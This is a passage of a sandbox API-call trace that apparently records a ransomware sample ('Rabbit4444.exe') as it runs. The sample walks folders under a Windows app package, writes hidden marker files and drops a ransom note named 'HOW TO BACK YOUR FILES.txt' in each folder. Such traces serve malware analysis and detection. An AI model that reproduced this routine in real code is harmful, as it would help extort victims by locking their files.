ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0064.530] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0064.530] lstrcpyW (in: lpString1=0x130ebd8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.530] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.531] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.531] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.531] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.531] CloseHandle (hObject=0x2a0) returned 1 [0064.531] CloseHandle (hObject=0x2cc) returned 1 [0064.531] GetCurrentThreadId () returned 0xd98 [0064.531] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0064.531] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp" [0064.531] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1240e0 | out: hHeap=0xe0000) returned 1 [0064.531] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0064.531] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp" [0064.531] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\" [0064.531] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0064.531] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.533] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.535] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.539] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.540] CloseHandle (hObject=0x2cc) returned 1 [0064.540] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp") returned 84 [0064.540] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.540] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152c735, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefc95abf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0064.540] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.540] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.540] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.540] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.540] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152c735, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefc95abf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.541] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.541] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.541] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.541] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.541] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.541] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefc95abf, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefc95abf, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefc95abf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.541] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.541] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.541] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefc95abf, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefc95abf, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefc95abf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.541] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0064.541] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.541] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.541] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.541] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.542] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.542] CloseHandle (hObject=0x2a0) returned 1 [0064.542] CloseHandle (hObject=0x2cc) returned 1 [0064.542] GetCurrentThreadId () returned 0xd98 [0064.542] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122168 [0064.542] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory" [0064.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122d80 | out: hHeap=0xe0000) returned 1 [0064.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122160 | out: hHeap=0xe0000) returned 1 [0064.542] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory" [0064.542] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\" [0064.542] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0064.542] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.544] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.546] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.547] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.547] CloseHandle (hObject=0x2cc) returned 1 [0064.548] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory") returned 91 [0064.548] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.548] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152bdcc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefcbbde7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0064.548] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.548] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.548] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.548] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.548] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152bdcc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefcbbde7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.548] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.548] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.548] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.548] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.548] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.548] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefcbbde7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefcbbde7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefcbbde7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.548] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.549] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.549] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefcbbde7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefcbbde7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefcbbde7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.549] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0064.549] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.549] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.549] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.549] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.550] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.550] CloseHandle (hObject=0x2a0) returned 1 [0064.550] CloseHandle (hObject=0x2cc) returned 1 [0064.550] GetCurrentThreadId () returned 0xd98 [0064.550] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122028 [0064.550] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies" [0064.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122cc0 | out: hHeap=0xe0000) returned 1 [0064.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122020 | out: hHeap=0xe0000) returned 1 [0064.550] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies" [0064.550] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\" [0064.550] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0064.550] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.551] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.553] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.554] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.554] CloseHandle (hObject=0x2cc) returned 1 [0064.555] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies") returned 91 [0064.555] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.555] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152b40a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefcbbde7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0064.555] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.555] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.555] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.555] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.555] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152b40a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefcbbde7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.555] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.555] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.555] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.555] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.555] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.555] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefcbbde7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefcbbde7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefcbbde7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.555] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.555] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.555] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefcbbde7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefcbbde7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefcbbde7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.555] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0064.555] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.555] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.556] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.556] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.556] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.556] CloseHandle (hObject=0x2a0) returned 1 [0064.556] CloseHandle (hObject=0x2cc) returned 1 [0064.557] GetCurrentThreadId () returned 0xd98 [0064.557] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0064.557] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: 